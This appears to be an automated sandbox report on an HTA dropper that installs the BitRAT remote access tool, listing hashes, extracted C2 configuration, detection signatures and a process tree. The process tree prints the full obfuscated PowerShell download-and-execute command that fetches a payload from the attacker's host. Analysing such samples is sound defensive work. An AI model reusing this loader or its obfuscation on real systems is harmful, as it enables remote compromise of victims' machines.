Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
20-01-2022 14:32
General
-
Target
135.148.74.241_HCrypt/PS1.hta
-
Size
3KB
-
MD5
37f9dc388fedc16b308acaadc34c2054
-
SHA1
25c936c0b399b82ad39363f6237fd5db13369bda
-
SHA256
f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3
-
SHA512
f7a335e8b559079ea7b8d8d9341f0d13e3b7c23af4858d87f350df698f2580e83a7c3e84a69cdb003f83b68127a45943cfbb5cd11c44cc3a8446fb30ace85fc4
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://135.148.74.241/PS1_B.txt
Extracted
Family
bitrat
Version
1.38
C2
135.148.74.241:8080
Attributes
-
communication_password
f1c1592588411002af340cbaedd6fc33
-
tor_process
tor
Signatures
-
BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
-
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
-
Blocklisted process makes network request 2 IoCs
-
Sets service image path in registry 2 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe aed221520e0f14fb3027394fae42bfb3 C25sboTFCk+5gsrP8JQ7OQ.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/3744-140-0x00000000068C5000-0x00000000068C7000-memory.dmpFilesize
8KB
-
memory/3744-142-0x00000000080A0000-0x00000000080BA000-memory.dmpFilesize
104KB
-
memory/3744-137-0x0000000006E80000-0x0000000006EE6000-memory.dmpFilesize
408KB
-
memory/3744-138-0x0000000007530000-0x0000000007596000-memory.dmpFilesize
408KB
-
memory/3744-139-0x0000000007A00000-0x0000000007A1E000-memory.dmpFilesize
120KB
-
memory/3744-132-0x0000000004250000-0x0000000004286000-memory.dmpFilesize
216KB
-
memory/3744-141-0x00000000091B0000-0x000000000982A000-memory.dmpFilesize
6.5MB
-
memory/3744-136-0x0000000006CB0000-0x0000000006CD2000-memory.dmpFilesize
136KB
-
memory/3744-143-0x0000000009010000-0x00000000090A6000-memory.dmpFilesize
600KB
-
memory/3744-144-0x0000000008FA0000-0x0000000008FC2000-memory.dmpFilesize
136KB
-
memory/3744-145-0x0000000009DE0000-0x000000000A384000-memory.dmpFilesize
5.6MB
-
memory/3744-135-0x00000000068C2000-0x00000000068C3000-memory.dmpFilesize
4KB
-
memory/3744-134-0x0000000006F00000-0x0000000007528000-memory.dmpFilesize
6.2MB
-
memory/3744-133-0x00000000068C0000-0x00000000068C1000-memory.dmpFilesize
4KB